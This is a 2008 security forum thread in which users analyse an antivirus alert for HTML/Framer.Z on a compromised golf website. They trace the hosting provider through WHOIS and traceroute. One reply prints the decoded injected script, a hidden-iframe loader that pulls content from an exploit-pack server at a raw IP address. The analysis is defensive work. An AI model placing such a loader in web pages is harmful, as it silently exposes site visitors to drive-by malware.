Search:  

 
theme to black backgroundlet page decide theme
HomeFind ServiceReviewsISP NewsFAQsForumsToolsDatabaseAbout 
 
   All ForumsHot TopicsGallery






how-to block ads


 
Forums » Up and Running » Security » Security » Question about HTML/Framer.Z
Search Topic:
 Share Topic:
RSS topic:
toggle:
flat / full
normal / watch
Posting:
Post a:
Post a:
Links: ·Hijack This logs? ·Panda Free Tools ·Vundo Removal
Avira wants to be shure you know about their products »
« Report: boot sector viruses and rootkits poised for comeback  
AuthorAll Replies


mpw101

@cableone.net		reply to zteardrop
Re: Question about HTML/Framer.Z

AVG 7.5 free addition is alerting to HTML/Framer.Z on this site: www.pci-golf.com.
to forum · permalink · 2008-04-05 12:16:06 · Reply to this


foxsteve
Premium
join:2001-12-28
Campbell, CA

4 edits		Re: Question about HTML/Framer.Z

That sequence (%77%69%6e%64%6f%77%2e...) may be decoded as here

window.status='Done';document.write('<iframe name=a0a5a src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*43280)+'8b6\' width=541 height=80 style=\'display: none\'></iframe>')

Only one website was found with this IP 58.65.232.33, however this website was not related to any domain name.

Additional information.

This IP is allocated to APNIC (Asia Pacific Network Information Centre)
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

inetnum: 58.65.232.0 - 58.65.239.255
netname: HOSTFRESH
descr: Internet Service Provider
status: ALLOCATED PORTABLE
person: Piu Lo
nic-hdl: PL466-AP
e-mail: ipadmin@hostfresh.com
address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
phone: +852-35979788
fax-no: +852-24522539
country: HK

WEB site is active and here is a result of calling that URL http://58.65.232.33/gpack/index.php

PS. For bobince See Profile
As you see that server is located in Hong-Kong and it is not Russia. :)
to forum · permalink · · 2008-04-05 18:21:28 · Reply to this

bobince

join:2002-04-19
DE
quote:
As you see that server is located in Hong-Kong and it is not Russia
True, that's where it's hosted, but the operators of the server are almost certainly members of Russian-language malware community and not residents of HK.

HostFresh is a black-hat provider of dedicated servers catering primarily to the Russians. It was previously housed alongside another major black-hat ISP, Esthost, in the Atrivo/Intercage Netblock of Hell.
to forum · permalink · · 2008-04-06 11:35:18 · Reply to this


foxsteve
Premium
join:2001-12-28
Campbell, CA

1 edit		 If this is information from Piu Lo
nic-hdl: PL466-AP
e-mail: ipadmin@hostfresh.com
address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
phone: +852-35979788
fax-no: +852-24522539
....

>tracert 58.65.232.33

Tracing route to oracle.dmain.name [58.65.232.33]
over a maximum of 30 hops:
...............
8 126 ms 127 ms 127 ms po12- 0.cr2.nrt1.asianetcom.net [202.147.50.146]

9 183 ms 185 ms 183 ms gi6-2.cr1.hkg3.asianetcom.net [202.147.16.93]

10 190 ms 188 ms 190 ms po15-0.gw2.hkg3.asianetcom.net [202.147.16.210]

11 187 ms 186 ms 187 ms HFI-0002.gw2.hkg3.asianetcom.net [202.147.17.90]

12 187 ms 186 ms 187 ms 58.65.235.230

13 186 ms 187 ms 187 ms 116.50.12.10

14 182 ms 183 ms 184 ms oracle.dmain.name [58.65.232.33]
to forum · permalink · · 2008-04-06 13:08:09 · Reply to this
Forums » Up and Running » Security » SecurityAvira wants to be shure you know about their products »
« Report: boot sector viruses and rootkits poised for comeback  

Tuesday, 10-Nov 06:18:57 Terms of Use | Privacy Policy | Hosting by www.nac.net - DSL,Hosting & Co-lo | feedback | contact
over 10 years online! © 1999-2009 dslreports.com.
page compression OFF
Most commented news this week
· [83] VoIP Over 3G Still Not Working For iPhone
· [82] Verizon Keeps Swinging At AT&T
· [33] Bill Would Force ISPs To Block Financial Scams
· [24] Mediacom Hints At 50, 100 Mbps Speeds
· [14] Clearwire To Get Another $1.5 Billion
· [11] Monday Morning Links
· [9] 15 States Have Now Gotten Broadband Mapping Money
· [6] AT&T Launching New 7.2 Mbps 3G Modem
Most people now reading
· 3.x Feral Druid - Bear Tanking Guide [World of Warcraft]
· Windows 7 boot manager editing questions [Microsoft Help]
· WoW Updater cannot find wow.exe? [World of Warcraft]
· How in the world am I going to get into college? [General Questions]
· Blown out Ballasts [Home Repair & Improvement]
· My cat is reluctant to exercise. [General Questions]
· Connecting to Google Voice Via SIP [VOIP Tech Chat]
· 60 Minutes piece on cyber security last night [Security]
· Know when to run! [Home Repair & Improvement]
· MI424WR-GEN2 Rev E Configuration Thread [Verizon Fiber Optics]